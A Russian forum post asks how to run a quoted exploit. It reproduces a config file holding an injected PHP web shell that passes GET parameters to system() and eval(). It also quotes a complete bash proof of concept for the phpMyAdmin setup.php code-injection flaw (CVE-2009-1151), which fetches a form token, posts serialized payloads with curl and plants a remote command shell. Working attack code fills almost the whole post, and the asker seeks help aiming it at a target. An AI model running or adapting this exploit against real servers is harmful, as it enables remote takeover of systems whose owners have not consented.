
Старый 31.07.2012, 08:27
WendM

Добрый день. Разъясните, пожалуйста, по поводу вот этого эксплоита.

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

* Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $

* Date: Tue, 09 Jun 2009 14:13:34 GMT

*/

/* Servers configuration */

[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#FF8000"]/* Server (config:root) [1] */

[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]++;

[/
COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'c'[/COLOR][COLOR="#007700"]]){echo

[/
COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'c'[/COLOR][COLOR="#007700"]]);echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];}if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]]){echo

[/
COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];eval([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"]]);echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];};[/COLOR][COLOR="#FF8000"]//'] = 'localhost';

[/COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'extension'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'mysqli'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'connect_type'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'tcp'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'compress'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'auth_type'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'config'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$cfg[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Servers'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'root'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#FF8000"]/* End of servers configuration */

[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR] 
Где в данном коде нужно указать ссылку на уязвимый phpmyadmin?

И ещё: чем запускать данный эксплоит?

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#!/bin/bash

# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11

# by pagvac (gnucitizen.org), 4th June 2009.

# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,

# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:

# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1

# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:

# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5

# and 3.x before 3.1.3.1 according to PMASA-2009-3

# 2) it *seems* this vuln can only be exploited against environments

# where the administrator has chosen to install phpMyAdmin following

# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx

# 3) administrator must have NOT deleted the '/config/' directory

# within the '/phpMyAdmin/' directory. this is because this directory is

# where '/scripts/setup.php' tries to create 'config.inc.php' which is where

# our evil PHP code is injected 8)

# more info on:

# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php

# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

[/COLOR][COLOR="#007700"]if [[ $[/COLOR][COLOR="#FF8000"]# -ne 1 ]]

[/COLOR][COLOR="#0000BB"]then

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"usage: ./$(basename $0) "

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"

[/COLOR][COLOR="#007700"]exit

[/
COLOR][COLOR="#0000BB"]fi

[/COLOR][COLOR="#007700"]if ![/COLOR][COLOR="#0000BB"]which curl[/COLOR][COLOR="#007700"]>/[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null

then

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"sorry but you need curl for this script to work!"

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"on Debian/Ubuntu: sudo apt-get install curl"

[/COLOR][COLOR="#007700"]exit

[/
COLOR][COLOR="#0000BB"]fi

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]exploit[/COLOR][COLOR="#007700"]{

[/
COLOR][COLOR="#0000BB"]postdata[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"token=$1&action=save&configuration="[/COLOR][COLOR="#007700"]\

[/
COLOR][COLOR="#DD0000"]"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22h ost%27]="[/COLOR][COLOR="#007700"]\

[/
COLOR][COLOR="#DD0000"]"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"[/COLOR][COLOR="#007700"]\

[/
COLOR][COLOR="#DD0000"]"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22conne ct_type%22%3bs:3:"[/COLOR][COLOR="#007700"]\

[/
COLOR][COLOR="#DD0000"]"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth _type%22%3bs:6:"[/COLOR][COLOR="#007700"]\

[/
COLOR][COLOR="#DD0000"]"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b} }}&eoltype=unix"

[/COLOR][COLOR="#0000BB"]postdata2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"token=$1&action=save&configuration=a:1:"[/COLOR][COLOR="#007700"]\

[/
COLOR][COLOR="#DD0000"]"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host %27%5d="[/COLOR][COLOR="#007700"]\

[/
COLOR][COLOR="#DD0000"]"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cp re%3e%27%3b"[/COLOR][COLOR="#007700"]\

[/
COLOR][COLOR="#DD0000"]"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"[/COLOR][COLOR="#007700"]\

[/
COLOR][COLOR="#DD0000"]"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3be val"[/COLOR][COLOR="#007700"]\

[/
COLOR][COLOR="#DD0000"]"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"[/COLOR][COLOR="#007700"]\

[/
COLOR][COLOR="#DD0000"]"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3b s:6:%22"[/COLOR][COLOR="#007700"]\

[/
COLOR][COLOR="#DD0000"]"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%2 2%3bs:8:"[/COLOR][COLOR="#007700"]\

[/
COLOR][COLOR="#DD0000"]"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:% 22config"[/COLOR][COLOR="#007700"]\

[/
COLOR][COLOR="#DD0000"]"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

[/COLOR][COLOR="#0000BB"]flag[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"/tmp/$(basename $0).[/COLOR][COLOR="#0000BB"]$RANDOM[/COLOR][COLOR="#DD0000"].phpinfo.flag.html"



[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"[+] attempting to inject phpinfo() ..."

[/COLOR][COLOR="#0000BB"]curl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ks[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]$[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]d[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$postdata[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#DD0000"]"$3/scripts/setup.php"[/COLOR][COLOR="#007700"]>/[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null

[/COLOR][COLOR="#007700"]if[/COLOR][COLOR="#0000BB"]curl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ks[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#DD0000"]"$3/config/config.inc.php"[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]grep[/COLOR][COLOR="#DD0000"]"phpinfo()"[/COLOR][COLOR="#007700"]>/[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null

then

curl
[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ks[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#DD0000"]"$3/config/config.inc.php"[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]$flag

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"[+] success! phpinfo() injected successfully! output saved on[/COLOR][COLOR="#0000BB"]$flag[/COLOR][COLOR="#DD0000"]"

[/COLOR][COLOR="#0000BB"]curl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]ks[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]$[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]d $postdata2[/COLOR][COLOR="#007700"]--[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#DD0000"]"$3/scripts/setup.php"[/COLOR][COLOR="#007700"]>/[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]" $3/config/config.inc.php?c=ls+-l+/"

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]" $3/config/config.inc.php?p=phpinfo();"

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]" please send any feedback/improvements for this script to"[/COLOR][COLOR="#007700"]\

[/
COLOR][COLOR="#DD0000"]"unknown.pentestergmail.com"

[/COLOR][COLOR="#007700"]else

echo[/COLOR][COLOR="#DD0000"]"[+] no luck injecting to $3/config/config.inc.php :("

[/COLOR][COLOR="#007700"]exit

[/
COLOR][COLOR="#0000BB"]fi

[/COLOR][COLOR="#007700"]}

[/
COLOR][COLOR="#FF8000"]# end of exploit function

[/COLOR][COLOR="#0000BB"]cookiejar[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"/tmp/$(basename $0).[/COLOR][COLOR="#0000BB"]$RANDOM[/COLOR][COLOR="#DD0000"].txt"

[/COLOR][COLOR="#0000BB"]token[/COLOR][COLOR="#007700"]=`[/COLOR][COLOR="#DD0000"]curl -ks -c[/COLOR][COLOR="#0000BB"]$cookiejar[/COLOR][COLOR="#DD0000"]--url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12[/COLOR][COLOR="#007700"]`

echo[/
COLOR][COLOR="#DD0000"]"[+] checking if phpMyAdmin exists on URL provided ..."

[/COLOR][COLOR="#FF8000"]#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null

[/COLOR][COLOR="#007700"]if[/COLOR][COLOR="#0000BB"]grep phpMyAdmin $cookiejar[/COLOR][COLOR="#007700"]&>/[/COLOR][COLOR="#0000BB"]dev[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]null

then

length
[/COLOR][COLOR="#007700"]=`[/COLOR][COLOR="#DD0000"]echo -n[/COLOR][COLOR="#0000BB"]$token[/COLOR][COLOR="#DD0000"]| wc -c[/COLOR][COLOR="#007700"]`

[/
COLOR][COLOR="#FF8000"]# valid form token obtained?

[/COLOR][COLOR="#007700"]if [[[/COLOR][COLOR="#0000BB"]$length[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]eq 32[/COLOR][COLOR="#007700"]]]

[/
COLOR][COLOR="#0000BB"]then

[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"[+] phpMyAdmin cookie and form token received successfully. Good!"

[/COLOR][COLOR="#FF8000"]# attempt exploit!

[/COLOR][COLOR="#0000BB"]exploit $token $cookiejar[/COLOR][COLOR="#007700"]$[/COLOR][COLOR="#0000BB"]1

[/COLOR][COLOR="#007700"]else

echo[/COLOR][COLOR="#DD0000"]"[+] could not grab form token. you might want to try exploiting the vuln manually :("

[/COLOR][COLOR="#007700"]exit

[/
COLOR][COLOR="#0000BB"]fi

[/COLOR][COLOR="#007700"]else

echo[/COLOR][COLOR="#DD0000"]"[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"

[/COLOR][COLOR="#007700"]exit

[/
COLOR][COLOR="#0000BB"]fi

[/COLOR][COLOR="#FF8000"]# milw0rm.com [2009-06-09][/COLOR][/COLOR] 
С нетерпением жду ответа! Спасибо!
 